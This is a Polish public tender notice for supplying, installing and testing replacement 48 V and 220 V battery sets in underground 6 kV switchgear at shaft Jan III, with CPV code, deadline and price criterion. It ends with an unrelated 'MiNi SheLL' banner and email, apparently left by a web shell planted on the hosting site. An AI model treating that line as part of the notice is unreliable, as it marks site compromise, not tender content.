dostawę 2 szt. nowych bezobsługowych baterii akumulatorów o pojemności znamiono­wej 18 Ah i napięciu znamionowym 48 V wraz z technologią ich wymiany, świadectwem jakości i dokumentacją techniczno-ruchową,
demontaż wyeksploatowanych baterii łącznie z ich wytransportowaniem                          i utylizacją,
transport elementów baterii szybem Jan III na poz. 690 m, a następnie do miejsca zabudowy w rozdzielni dołowej 6 kV R-691 na poz. 690 m (droga transportu na dole wynosi ok. 300 m - możliwy transport po torach),
montaż 2 szt. dostarczonych baterii akumulatorowych 48 V/18 Ah na istniejących stelażach wraz z ich podłączeniem, przy uwzględnieniu następujących warunków:
baterie akumulatorowe powinny współpracować z istniejącym układem pomiarowym oraz z zespołem kontrolującym prawidłowość pracy układu bateria-zasilacz-odbiory,
wszystkie połączenia ogniw oraz baterii i zasilacza muszą być skręcane,
uruchomienie zainstalowanych baterii akumulatorowych wraz z wykonaniem niezbędnych prób i pomiarów odbiorczych - potwierdzone protokołami, które będą podlegały przeka­zaniu Zamawiającemu.

2)	w zakresie baterii akumulatorowych w rozdzielni 6 kV R-201 na poz. 202 m:
dostawę 2 szt. nowych bezobsługowych baterii akumulatorów o pojemności znamiono­wej 18 Ah i napięciu znamionowym 48 V wraz z technologią ich wymiany, świadectwem jakości i dokumentacją techniczno-ruchową,
demontaż wyeksploatowanych baterii łącznie z ich wytransportowaniem i utylizacją,
transport elementów baterii szybem Jan III na poz. 202 m, a następnie do miejsca zabudowy w rozdzielni dołowej 6 kV R-201 na poz. 202 m (droga transportu na dole wynosi ok. 50 m - możliwy transport po torach),
montaż 2 szt. dostarczonych baterii akumulatorowych 48 V/18 Ah na istniejących stelażach wraz z ich podłączeniem, przy uwzględnieniu następujących warunków:
baterie akumulatorowe powinny współpracować z istniejącym układem pomiarowym,
wszystkie połączenia ogniw oraz baterii i zasilacza muszą być skręcane,
uruchomienie zainstalowanych baterii akumulatorowych wraz z wykonaniem niezbędnych prób i pomiarów odbiorczych - potwierdzone protokołami, które będą podlegały przeka­zaniu Zamawiającemu.

3)	w zakresie baterii akumulatorowej w rozdzielni 6 kV maszyny wyciągowej szybu Jan III:
dostawę 1 szt. nowej bezobsługowej baterii akumulatorowej o pojemności znamionowej 90 Ah i napięciu znamionowym 220 V wraz z technologią jej wymiany, świadectwem jakości i dokumentacją techniczno-ruchową,
demontaż wyeksploatowanej baterii łącznie z jej wytransportowaniem i utylizacją,
rozładunek i montaż dostarczonej baterii akumulatorowej 220 V/90 Ah na istniejących stelażach wraz z jej podłączeniem, przy uwzględnieniu następujących warunków:
bateria akumulatorowa powinna współpracować z istniejącym zasilaczem,
bateria akumulatorowa powinna współpracować z istniejącym układem pomiarowym oraz z zespołem kontrolującym prawidłowość pracy układu bateria-prostownik-odbiory,
wszystkie połączenia ogniw oraz baterii i zasilacza muszą być skręcane,
uruchomienie zainstalowanej baterii akumulatorowej wraz z wykonaniem niezbędnych prób i pomiarów odbiorczych - potwierdzone protokołami, które będą podlegały przeka­zaniu Zamawiającemu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.43.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com